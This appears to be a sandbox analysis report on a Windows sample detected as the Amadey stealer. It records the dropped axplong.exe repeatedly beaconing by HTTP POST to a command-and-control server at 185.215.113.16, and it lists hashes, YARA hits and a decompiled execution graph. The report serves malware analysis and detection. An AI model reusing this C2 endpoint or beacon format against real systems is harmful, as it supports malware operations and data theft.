                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:54:00.988735914 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:54:01.211582899 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:54:01 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    50192.168.2.449787185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:54:01.325613976 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:54:02.022337914 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:54:01 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:54:02.025262117 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:54:02.247054100 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:54:02 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    51192.168.2.449788185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:54:02.388056993 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:54:03.154484987 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:54:03 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:54:03.156116009 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:54:03.389786959 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:54:03 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    52192.168.2.449789185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:54:03.502321959 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:54:04.277812004 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:54:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    53192.168.2.449790185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:54:04.304600000 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:54:05.047624111 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:54:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    54192.168.2.449791185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:54:05.865866899 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:54:06.519933939 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:54:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:54:06.523760080 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:54:06.746560097 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:54:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    55192.168.2.449792185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:54:06.859533072 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:54:07.572273016 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:54:07 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    56192.168.2.449793185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:54:07.581801891 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:54:08.339982033 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:54:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Click to jump to process

                    Click to jump to process

                    Click to dive into process behavior distribution

                    Click to jump to process

                    Target ID:0
                    Start time:23:52:02
                    Start date:26/09/2024
                    Path:C:\Users\user\Desktop\file.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\file.exe"
                    Imagebase:0xee0000
                    File size:1'930'240 bytes
                    MD5 hash:8367D2F6EF5E11DB59EC8E4295378853
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1789336542.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1743323131.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true

                    Target ID:1
                    Start time:23:52:05
                    Start date:26/09/2024
                    Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Imagebase:0xf20000
                    File size:1'930'240 bytes
                    MD5 hash:8367D2F6EF5E11DB59EC8E4295378853
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.1818290086.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.1776904295.0000000004C80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Antivirus matches:
                    • Detection: 100%, Avira
                    • Detection: 100%, Joe Sandbox ML
                    Reputation:low
                    Has exited:true

                    Target ID:2
                    Start time:23:52:05
                    Start date:26/09/2024
                    Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                    Imagebase:0xf20000
                    File size:1'930'240 bytes
                    MD5 hash:8367D2F6EF5E11DB59EC8E4295378853
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1818369517.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.1777396325.0000000004B80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true

                    Target ID:6
                    Start time:23:53:00
                    Start date:26/09/2024
                    Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Imagebase:0xf20000
                    File size:1'930'240 bytes
                    MD5 hash:8367D2F6EF5E11DB59EC8E4295378853
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.2324424326.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:false

                    Reset < >
                      Memory Dump Source
                      • Source File: 00000000.00000002.1791199971.0000000004CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4ce0000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6321375f35c66df6f5851b7a8fda9246b3a1d9a694868a9361c63aa8d24ab78e
                      • Instruction ID: d3311e133f61c7033c81d1c39e36ac5eb4ffdd7cafb6b70c3f140ca407894346
                      • Opcode Fuzzy Hash: 6321375f35c66df6f5851b7a8fda9246b3a1d9a694868a9361c63aa8d24ab78e
                      • Instruction Fuzzy Hash: 4AE06DA724E135ED1181514327166B92B1BB1C633033C9827F04BD5582F7C8FB8973B6
                      Memory Dump Source
                      • Source File: 00000000.00000002.1791199971.0000000004CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4ce0000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 36cd0cc9f59b8f998715af05fc561255a360ec0510813bda7842adae396de51c
                      • Instruction ID: 6d7fb35c51ef4f62601e4f5f6e4cfa5403e65a814f6c3f584c2b80f5591d8e3f
                      • Opcode Fuzzy Hash: 36cd0cc9f59b8f998715af05fc561255a360ec0510813bda7842adae396de51c
                      • Instruction Fuzzy Hash: 3401D4A734E230FE610196436785AB66B6FE1C63303388826F407C5641F3D8FB4576B2
                      Memory Dump Source
                      • Source File: 00000000.00000002.1791199971.0000000004CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4ce0000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cf5f12c19f261f3fd4fb20b0f8a83cf855f6d36a93332cdca3d5d1a122f25baa
                      • Instruction ID: f13867cc748e8c85562dbb003aa8ee805b20b17d9bfd381e0c2739b7b913168a
                      • Opcode Fuzzy Hash: cf5f12c19f261f3fd4fb20b0f8a83cf855f6d36a93332cdca3d5d1a122f25baa
                      • Instruction Fuzzy Hash: 8C01B1A724E230EE600186435755AB6676FE1C63303388826F407C6541E3D8BB4936B2
                      Memory Dump Source
                      • Source File: 00000000.00000002.1791199971.0000000004CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4ce0000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7d72dd43073c9565642dac70baea5e421c34f493f69844538262daf07271d737
                      • Instruction ID: d55361469511893aa5cc35e01f0d9fbde5566dd7343fb09ddeb4cc6f81469a49
                      • Opcode Fuzzy Hash: 7d72dd43073c9565642dac70baea5e421c34f493f69844538262daf07271d737
                      • Instruction Fuzzy Hash: 7E01D4A7209230FD6102865397449B6772FE6C63303388826F447C6542E7D4BB4576B2
                      Memory Dump Source
                      • Source File: 00000000.00000002.1791199971.0000000004CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4ce0000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e03297d2aabf614b5c57001f334c05f2c70f377c0e9cdacac75828fa745b533f
                      • Instruction ID: 42403b38be6bf58de07688287b817e7ec5d9bc7e65e4ccc3b581ad90998831e1
                      • Opcode Fuzzy Hash: e03297d2aabf614b5c57001f334c05f2c70f377c0e9cdacac75828fa745b533f
                      • Instruction Fuzzy Hash: 940176F620E130FE510092439A006FA672FE7C53303288816F047D6682E3E8FB8676B2
                      Memory Dump Source
                      • Source File: 00000000.00000002.1791199971.0000000004CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4ce0000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 568135eda80d570d4cc17d7656f254bafba77b237e552d6c8eec828b010956c8
                      • Instruction ID: 59cf1b5d1bd5e211815850d66d90e97d6522b3c96fbb928d0f9177c77540f852
                      • Opcode Fuzzy Hash: 568135eda80d570d4cc17d7656f254bafba77b237e552d6c8eec828b010956c8
                      • Instruction Fuzzy Hash: 4CF0F0A724E234ED5141525327566FA6B2FA1C63303389827F007D6582F3D8FB8972B2
                      Memory Dump Source
                      • Source File: 00000000.00000002.1791199971.0000000004CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4ce0000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 99f9feae74b90a6cb1de0464054ec79edb497a882d092a4bc781bd3cefd56183
                      • Instruction ID: 16bc529935ba6ff43425ff284eaa70075c0f91557a2b62a503a7b183bfcf72d2
                      • Opcode Fuzzy Hash: 99f9feae74b90a6cb1de0464054ec79edb497a882d092a4bc781bd3cefd56183
                      • Instruction Fuzzy Hash: B3F024A220D170EE814201031A695F92B2BB1D223133C845BF087C8182E7C8BB4A73F3
                      Memory Dump Source
                      • Source File: 00000000.00000002.1791199971.0000000004CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4ce0000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1bfca5b1cb0d462b36d559d1d987afb709c33a4e3daf5b95de7784e755032306
                      • Instruction ID: ac7a7deb09d2bcbadfacdf28fad5106757babe862b830e8f3d1ca34ab968b3d5
                      • Opcode Fuzzy Hash: 1bfca5b1cb0d462b36d559d1d987afb709c33a4e3daf5b95de7784e755032306
                      • Instruction Fuzzy Hash: ABE0EDAA24C030FD10029053665AABA2E2FE1C26303389416B04384582F7C5FB8522F1
                      Memory Dump Source
                      • Source File: 00000000.00000002.1791199971.0000000004CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4ce0000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3f497190aef7c37abc9cd757cf1a661dd4ed4ddda776d41edb5eedd9c464ad24
                      • Instruction ID: de650ef044c5014085959646042f4808f60f6d6962796957d2868e29a20aadcc
                      • Opcode Fuzzy Hash: 3f497190aef7c37abc9cd757cf1a661dd4ed4ddda776d41edb5eedd9c464ad24
                      • Instruction Fuzzy Hash: 3FE04FA724D035ED5042514326566B56B2FB1C623033C9416F047D8682F7C8F74933F6

                      Execution Graph

                      Execution Coverage:6.8%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:6%
                      Total number of Nodes:602
                      Total number of Limit Nodes:42
                      execution_graph 13737 f56974 13738 f5698c 13737->13738 13740 f56982 13737->13740 13739 f568bd 4 API calls 13738->13739 13741 f569a6 ___free_lconv_mon 13739->13741 13606 f286b0 13607 f286b6 13606->13607 13608 f56659 RtlAllocateHeap 13607->13608 13609 f286c3 13608->13609 13610 f286d6 13609->13610 13611 f566e7 4 API calls 13609->13611 13612 f286d0 13611->13612 13689 f2e410 13690 f2e435 13689->13690 13692 f2e419 13689->13692 13692->13690 13693 f2e270 13692->13693 13694 f2e280 __dosmaperr 13693->13694 13695 f58979 4 API calls 13694->13695 13697 f2e2bd std::_Xinvalid_argument 13695->13697 13696 f2e435 13696->13692 13697->13696 13698 f2e270 4 API calls 13697->13698 13698->13697 13728 f2dfd0 recv 13729 f2e032 recv 13728->13729 13730 f2e067 recv 13729->13730 13732 f2e0a1 13730->13732 13731 f2e1c3 13732->13731 13733 f3c5dc GetSystemTimePreciseAsFileTime 13732->13733 13734 f2e1fe 13733->13734 13735 f3c19a 10 API calls 13734->13735 13736 f2e268 13735->13736 13179 f31dd0 13183 f31e6b shared_ptr __dosmaperr 13179->13183 13180 f31e78 13181 f2e440 6 API calls 13180->13181 13182 f32936 shared_ptr std::_Xinvalid_argument 13181->13182 13183->13180 13183->13182 13196 f58979 13183->13196 13185 f32265 shared_ptr 13185->13182 13200 f56659 13185->13200 13189 f3268b shared_ptr __dosmaperr 13189->13182 13190 f58979 4 API calls 13189->13190 13191 f32759 13190->13191 13191->13180 13191->13182 13192 f327d1 13191->13192 13207 f2e440 13192->13207 13194 f32843 13194->13182 13225 f25df0 13194->13225 13197 f58994 13196->13197 13232 f586d7 13197->13232 13199 f5899e 13199->13185 13322 f565a2 13200->13322 13202 f3267a 13202->13180 13203 f566e7 13202->13203 13204 f566f3 13203->13204 13206 f566fd __cftof __dosmaperr 13204->13206 13338 f56670 13204->13338 13206->13189 13208 f2e489 13207->13208 13361 f2bd60 13208->13361 13210 f2e9a9 shared_ptr 13210->13194 13211 f2e711 13211->13210 13212 f2e440 6 API calls 13211->13212 13214 f2f696 13212->13214 13213 f2f892 shared_ptr 13213->13194 13214->13213 13215 f2e440 6 API calls 13214->13215 13217 f2f973 13215->13217 13216 f2fa45 shared_ptr 13216->13194 13217->13216 13218 f56659 RtlAllocateHeap 13217->13218 13219 f2fbf1 13218->13219 13220 f2e440 6 API calls 13219->13220 13222 f3054c 13220->13222 13221 f30790 shared_ptr 13221->13194 13222->13221 13223 f2e440 6 API calls 13222->13223 13224 f311f9 13223->13224 13227 f25e28 13225->13227 13226 f25f0e shared_ptr 13226->13182 13227->13226 13228 f26060 RegOpenKeyExA 13227->13228 13229 f2645a shared_ptr 13228->13229 13231 f260b3 __cftof 13228->13231 13229->13182 13230 f26153 RegEnumValueW 13230->13231 13231->13229 13231->13230 13233 f586e9 13232->13233 13237 f586fe __cftof __dosmaperr 13233->13237 13238 f5683a 13233->13238 13236 f5872e 13236->13237 13244 f58925 13236->13244 13237->13199 13239 f56851 13238->13239 13240 f5685a 13238->13240 13239->13236 13240->13239 13250 f5b4bb 13240->13250 13245 f58962 13244->13245 13247 f58932 13244->13247 13315 f5d2e9 13245->13315 13249 f58941 __fassign 13247->13249 13310 f5d30d 13247->13310 13249->13236 13251 f5b4ce 13250->13251 13253 f56890 13250->13253 13251->13253 13258 f5f46b 13251->13258 13254 f5b4e8 13253->13254 13255 f5b4fb 13254->13255 13257 f5b510 13254->13257 13255->13257 13293 f5e571 13255->13293 13257->13239 13260 f5f477 __fassign 13258->13260 13259 f5f4c6 13259->13253 13260->13259 13263 f58aaf 13260->13263 13262 f5f4eb 13264 f58ab4 __fassign 13263->13264 13267 f58abf 13264->13267 13274 f5d4f4 13264->13274 13271 f5651d 13267->13271 13268 f5d727 RtlAllocateHeap 13269 f5d73a __dosmaperr 13268->13269 13270 f58af2 __fassign 13268->13270 13269->13262 13270->13268 13270->13269 13281 f563f7 13271->13281 13275 f5d500 __fassign 13274->13275 13276 f5651d __fassign 2 API calls 13275->13276 13277 f5d55c __cftof __dosmaperr __fassign 13275->13277 13280 f5d6ee __fassign 13276->13280 13277->13267 13278 f5d727 RtlAllocateHeap 13279 f5d73a __dosmaperr 13278->13279 13278->13280 13279->13267 13280->13278 13280->13279 13282 f56405 __fassign 13281->13282 13283 f56450 13282->13283 13286 f5645b 13282->13286 13283->13270 13291 f5a1c2 GetPEB 